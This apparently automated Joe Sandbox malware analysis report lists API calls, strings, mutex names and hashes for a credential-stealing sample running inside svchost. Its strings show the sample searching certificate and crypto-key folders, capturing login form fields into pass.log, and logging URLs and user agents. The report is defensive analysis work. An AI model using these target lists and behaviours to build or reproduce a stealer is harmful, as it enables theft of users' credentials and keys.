                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 02C7F92D
                                                                                                                                                                                                            • InternetQueryOptionA.WININET(?,00000015,?,00000000), ref: 02C7F949
                                                                                                                                                                                                            • InternetQueryOptionA.WININET(?,00000015,?,00000000), ref: 02C7F95C
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000110), ref: 02C7F96C
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 02C7F96F
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C7F98A
                                                                                                                                                                                                            • InternetQueryOptionA.WININET(?,00000029,00000000,00000104), ref: 02C7F99D
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,?), ref: 02C7F9E9
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 02C7F9EC
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C7FA00
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C7FA10
                                                                                                                                                                                                            • memcpy.MSVCRT(00000000,?,?,00000000,00000000,?), ref: 02C7FA1E
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02C7FA60
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C7FA8C
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C7FA8F
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C7FA9C
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C7FA9F
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 02C7FAAB
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C7FAAE
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 02C7FABB
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C7FABE
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 02C7FAD4
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C7FAD7
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 02C7FAE4
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C7FAE7
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,?), ref: 02C7FB06
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C7FB0F
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 02C7FB18
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C7FB1B
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 02C7FB27
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C7FB2A
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 02C7FB33
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C7FB36
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Process$FreeValidatememset$AllocInternetOptionQuery$FileModuleName_snprintfmemcpy
                                                                                                                                                                                                            • String ID: UserAgent$[[[URL: %s%sProcess: %sUser-agent: %s]]]{{{%s$}}}
                                                                                                                                                                                                            • API String ID: 1808236364-2343086565
                                                                                                                                                                                                            • Opcode ID: 5059307e4bb5ab225c1b9cbe16d8d201204079fcf2b91f4c19c6fad84db03181
                                                                                                                                                                                                            • Instruction ID: 79b30ae1e4b622c55ed223cae5a6f65302ab7b872334e227b12909a26e2ec0b2
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5059307e4bb5ab225c1b9cbe16d8d201204079fcf2b91f4c19c6fad84db03181
                                                                                                                                                                                                            • Instruction Fuzzy Hash: F9A1E471D40219ABDB11DFA89C89FEFBBB8EF84714F048549F904A7280DB709E05CBA1
                                                                                                                                                                                                            Function 02C8C9E0 Relevance: 68.4, APIs: 25, Strings: 14, Instructions: 184threadCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,self.cer,00000000,00000000,00000000,?,02C7107F,00000000,?,02C7149C,00000000,?), ref: 02C8CA1A
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\crypto\,?,02C7107F,00000000,?,02C7149C,00000000,?), ref: 02C8CA28
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(00000001,02CB4230,?,02C7107F,00000000,?,02C7149C,00000000,?), ref: 02C8CA35
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\micros~\crypto\,?,02C7107F,00000000,?,02C7149C,00000000,?), ref: 02C8CAA7
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\maxthon3\public\,?,02C7107F,00000000,?,02C7149C,00000000,?), ref: 02C8CAB7
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\microsoft\crypto\,?,02C7107F,00000000,?,02C7149C,00000000,?), ref: 02C8CAC7
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\crypto pro\,?,02C7107F,00000000,?,02C7149C,00000000,?), ref: 02C8CAD7
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\progra~1\crypto~1\,?,02C7107F,00000000,?,02C7149C,00000000,?), ref: 02C8CAE7
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\temporary internet files\,?,02C7107F,00000000,?,02C7149C,00000000,?), ref: 02C8CAF7
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,:\users\public,?,02C7107F,00000000,?,02C7149C,00000000,?), ref: 02C8CB07
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,02CB81F4,?,02C7107F,00000000,?,02C7149C,00000000,?), ref: 02C8CB17
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(00000000,02CB4230,?,02C7107F,00000000,?,02C7149C,00000000,?), ref: 02C8CB23
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\cryptokit\,?,02C7107F,00000000,?,02C7149C,00000000,?), ref: 02C8CB33
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,:\progra~1\common~1\crypto~1,?,02C7107F,00000000,?,02C7149C,00000000,?), ref: 02C8CB3F
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02C8B260,?,00000000,00000000), ref: 02C8CB62
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CreateThread
                                                                                                                                                                                                            • String ID: :\progra~1\common~1\crypto~1$:\users\public$\crypto pro\$\crypto\$\cryptokit\$\maxthon3\public\$\microsoft\crypto\$\micros~\crypto\$\private\$\progra~1\crypto~1\$\public\$\temporary internet files\$crypto$self.cer
                                                                                                                                                                                                            • API String ID: 2422867632-4225811205
                                                                                                                                                                                                            • Opcode ID: d8506171dc54286aaa14f5635b2bd32ad6b004eb0e6c86e0684824d830d2683b
                                                                                                                                                                                                            • Instruction ID: f957749078c1dfe3f2d110b89996cccc822d6fa633d1d0f0118c3aedab972dff
                                                                                                                                                                                                            • Opcode Fuzzy Hash: d8506171dc54286aaa14f5635b2bd32ad6b004eb0e6c86e0684824d830d2683b
                                                                                                                                                                                                            • Instruction Fuzzy Hash: AB417271A8172675FA2AB6359C89FBB5E9C8ED09DCF108533FC06E2005EB74C70585B1
                                                                                                                                                                                                            Function 02C87A80 Relevance: 66.7, APIs: 28, Strings: 10, Instructions: 244memorystringthreadCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000002,7556F570,?,?), ref: 02C87AA3
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 02C87AAA
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C87ABE
                                                                                                                                                                                                            • IsBadReadPtr.KERNEL32(?,?), ref: 02C87ADB
                                                                                                                                                                                                            • memcpy.MSVCRT(00000000,?,?), ref: 02C87AEC
                                                                                                                                                                                                            • strstr.MSVCRT ref: 02C87AFD
                                                                                                                                                                                                            • strstr.MSVCRT ref: 02C87B10
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6D1DA0AA), ref: 02C87B3D
                                                                                                                                                                                                            • PathAppendA.SHLWAPI(?,6D1DA0AA), ref: 02C87B4B
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6D1DA0AA), ref: 02C87B56
                                                                                                                                                                                                            • strstr.MSVCRT ref: 02C87BB8
                                                                                                                                                                                                            • strstr.MSVCRT ref: 02C87BCB
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6D1DA718), ref: 02C87BFD
                                                                                                                                                                                                            • PathAppendA.SHLWAPI(?,6D1DA718), ref: 02C87C0B
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6D1DA718), ref: 02C87C16
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02C90BE0,00000000,00000000,00000000), ref: 02C87C71
                                                                                                                                                                                                            • strstr.MSVCRT ref: 02C87C90
                                                                                                                                                                                                            • strstr.MSVCRT ref: 02C87CA3
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6D1DA6D0), ref: 02C87CCF
                                                                                                                                                                                                            • PathAppendA.SHLWAPI(?,6D1DA6D0), ref: 02C87CDD
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6D1DA6D0), ref: 02C87CE8
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02C92320,00000000,00000000,00000000), ref: 02C87D43
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02C87D5B
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C87D6C
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C87D7B
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C87D7E
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C87D8B
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C87D8E
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Path$BackslashHeapstrstr$AppendProcess$CreateHandleThread$AllocCloseFreeInformationReadValidatememcpymemset
                                                                                                                                                                                                            • String ID: &ctl00%24MainMenu%24Login1%24Password=$&ctl00%24MainMenu%24Login1%24UserName=$6D1DA0AA$6D1DA6D0$6D1DA718$login=$name_$pass.log$pass_$password=
                                                                                                                                                                                                            • API String ID: 3712039096-1217459975
                                                                                                                                                                                                            • Opcode ID: bc4795ce0416027ea288db6e4c46cf741d845e9ab50ed49406029dc371d60518
                                                                                                                                                                                                            • Instruction ID: 252726fe71358585feb8e42241803de4c5eb0124164b5c0843582dd19360e73c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: bc4795ce0416027ea288db6e4c46cf741d845e9ab50ed49406029dc371d60518
                                                                                                                                                                                                            • Instruction Fuzzy Hash: D8818E31E4075467E7129B249C99FEB7BAC9F81745F24C0A5FD4997280EB70E948CBE0
                                                                                                                                                                                                            Function 02C8E3D0 Relevance: 65.0, APIs: 31, Strings: 6, Instructions: 253memorysynchronizationsleepCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6d1da208), ref: 02C8E3F8
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(02CCB8D0,00000000), ref: 02C8E439
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02C8E43F
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C8E447
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(02CCB8D0), ref: 02C8E456
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02C8E45D
                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(02CCB8D0,00000000), ref: 02C8E499
                                                                                                                                                                                                            • DeleteFileA.KERNEL32(02CCB8D0), ref: 02C8E4A4
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6d1da208,?,?), ref: 02C8E4E6
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(02CCB4B0,00000000), ref: 02C8E521
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02C8E527
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C8E52F
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(02CCB4B0), ref: 02C8E53E
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02C8E545
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(02CCB4B0,00000000), ref: 02C8E573
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02C8E579
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C8E581
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(02CCB4B0), ref: 02C8E590
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02C8E597
                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(?), ref: 02C8E5A1
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C8E5D7
                                                                                                                                                                                                            • SHFileOperationA.SHELL32(?), ref: 02C8E651
                                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}), ref: 02C8E662
                                                                                                                                                                                                            • Sleep.KERNEL32(000003E8), ref: 02C8E673
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02C8E67A
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02C8E68C
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C8E69C
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 02C8E6AE
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C8E6B1
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 02C8E6BE
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C8E6C1
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ErrorLast$Path$CreateFileHeap$AdminDirectoryFolderMakeSystemUser$AttributesBackslashHandleMutexProcess$CloseDeleteFreeInformationOperationReleaseSleepValidatememset
                                                                                                                                                                                                            • String ID: 6d1da208$Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}$P0Wu$\*.bk$keys\$path.txt
                                                                                                                                                                                                            • API String ID: 959110331-648450359
                                                                                                                                                                                                            • Opcode ID: 1da50f901f1b2a8d493264affff5fc432652e40cbd1404d00f32b51ac39a5e99
                                                                                                                                                                                                            • Instruction ID: 6466789fbf7a30f9a499f4654a09d8404d133709c81ab2713913d2c9a38732de
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1da50f901f1b2a8d493264affff5fc432652e40cbd1404d00f32b51ac39a5e99
                                                                                                                                                                                                            • Instruction Fuzzy Hash: A2911870E4468A9FE7129FB4982D7AB7BE8EF89309F148695F845D7301EB30CA05C790
                                                                                                                                                                                                            Function 02C77110 Relevance: 63.2, APIs: 32, Strings: 4, Instructions: 182memorysleepsynchronizationCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 02C76CD0: IsUserAnAdmin.SHELL32 ref: 02C76CDA
                                                                                                                                                                                                              • Part of subcall function 02C76CD0: memset.MSVCRT ref: 02C76D11
                                                                                                                                                                                                              • Part of subcall function 02C76CD0: memset.MSVCRT ref: 02C76D29
                                                                                                                                                                                                              • Part of subcall function 02C76CD0: RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,?,?,?,?,?,7556F380), ref: 02C76D4B
                                                                                                                                                                                                              • Part of subcall function 02C76CD0: RegQueryValueExA.ADVAPI32(?,00000001,00000000,00000001,?,00000104,?,?,?,?,7556F380), ref: 02C76D71
                                                                                                                                                                                                              • Part of subcall function 02C76CD0: GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,7556F380), ref: 02C76DFD
                                                                                                                                                                                                              • Part of subcall function 02C76CD0: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,7556F380), ref: 02C76E04
                                                                                                                                                                                                            • OpenMutexA.KERNEL32(00100000,00000000,Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}), ref: 02C77155
                                                                                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 02C77162
                                                                                                                                                                                                            • OpenMutexA.KERNEL32(00100000,00000000,Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}), ref: 02C77174
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02C7717D
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C77195
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C771A7
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,92F35F16a,92f35f97a), ref: 02C771B2
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C771B5
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C771C2
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C771C5
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,92F35F16a,92f35f97a), ref: 02C771D2
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C771D5
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C771E2
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C771E5
                                                                                                                                                                                                            • SetCaretBlinkTime.USER32(000000FF), ref: 02C771F7
                                                                                                                                                                                                            • Sleep.KERNEL32(000001F4), ref: 02C77225
                                                                                                                                                                                                            • StrToIntA.SHLWAPI(00000000,92F35F16a,92f35f97a), ref: 02C77255
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,92F35F16a,92f35f97a), ref: 02C77265
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C77268
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C77275
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C77278
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,92F35F16a,92f35f97a), ref: 02C77285
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C77288
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C77295
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C77298
                                                                                                                                                                                                            • Sleep.KERNEL32(00001388,92F35F16a,92f35f97a), ref: 02C772A3
                                                                                                                                                                                                            • closesocket.WS2_32(?), ref: 02C772D5
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,00000000,?), ref: 02C772F5
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 02C7730D
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02C7731F
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C77342
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C7735C
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Process$Free$HandleMutexValidate$OpenSleep$CloseInformationReleasememset$AdminAllocBlinkCaretQueryTimeUserValueclosesocket
                                                                                                                                                                                                            • String ID: 92F35F16a$92f35f97a$Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}$P0Wu
                                                                                                                                                                                                            • API String ID: 2871222221-1101217650
                                                                                                                                                                                                            • Opcode ID: 3548ed7930c8310a1a6d6fdce46fdacbe7c0baa39350409f53353e310799427f
                                                                                                                                                                                                            • Instruction ID: 355d3170b7eb5f5d60cfc9c333afc7f07641622d6f6c910446bbb4ad717ae0df
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3548ed7930c8310a1a6d6fdce46fdacbe7c0baa39350409f53353e310799427f
                                                                                                                                                                                                            • Instruction Fuzzy Hash: CC51E331E84798ABE722AB709C0CF2BBB6CAF84B55F044B54F919C7181DB74D9148BA1
                                                                                                                                                                                                            Function 02C8B260 Relevance: 58.0, APIs: 25, Strings: 8, Instructions: 268fileCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C8B27F
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6D1DA3E6), ref: 02C8B2B7
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C8B2F7
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02C8B301
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C8B309
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C8B31A
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02C8B321
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,crypto), ref: 02C8B333
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,self.cer), ref: 02C8B346
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,self.pub), ref: 02C8B357
                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(?,00000000), ref: 02C8B3A2
                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 02C8B3AF
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ErrorFileLastPath$AdminAttributesBackslashCreateDeleteDirectoryFolderMakeSystemUsermemset
                                                                                                                                                                                                            • String ID: 6D1DA3E6$Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}$P0Wu$crypto$keys.zip$path.txt$self.cer$self.pub
                                                                                                                                                                                                            • API String ID: 3980609930-283758916
                                                                                                                                                                                                            • Opcode ID: 8d69909094daf1b09538030effbc9798d8e4e2f7ea46bc0f6493ce76d0cedd48
                                                                                                                                                                                                            • Instruction ID: 5ad5ee6bccef20e133d7fc16b21af62fb9397bf821c6795b30a19155e8360a8c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8d69909094daf1b09538030effbc9798d8e4e2f7ea46bc0f6493ce76d0cedd48
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 98912631D402999FDB16AB749C59BEA7BE8AFC570CF04C698E94AD7240DB70DE04CB90
                                                                                                                                                                                                            Function 02C92AE0 Relevance: 56.2, APIs: 24, Strings: 8, Instructions: 193stringsynchronizationsleepCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • strstr.MSVCRT ref: 02C92B23
                                                                                                                                                                                                            • strstr.MSVCRT ref: 02C92B36
                                                                                                                                                                                                            • strstr.MSVCRT ref: 02C92B49
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02CCAFC0), ref: 02C92B77
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02CCAFC0), ref: 02C92BAD
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000,02CCAFC0), ref: 02C92BC2
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02C92BCC
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C92BD4
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C92BE5
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02C92BEC
                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNEL32(?), ref: 02C92BF9
                                                                                                                                                                                                            • strstr.MSVCRT ref: 02C92C2C
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02CCAFC0), ref: 02C92C57
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C92C91
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02C92C9B
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C92CA3
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C92CB4
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02C92CBB
                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNEL32(?), ref: 02C92CC8
                                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214},02C8753A,02C8753B), ref: 02C92CFE
                                                                                                                                                                                                            • Sleep.KERNEL32(000003E8), ref: 02C92D0F
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02C92D16
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,02C8753A), ref: 02C92D28
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C92D39
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
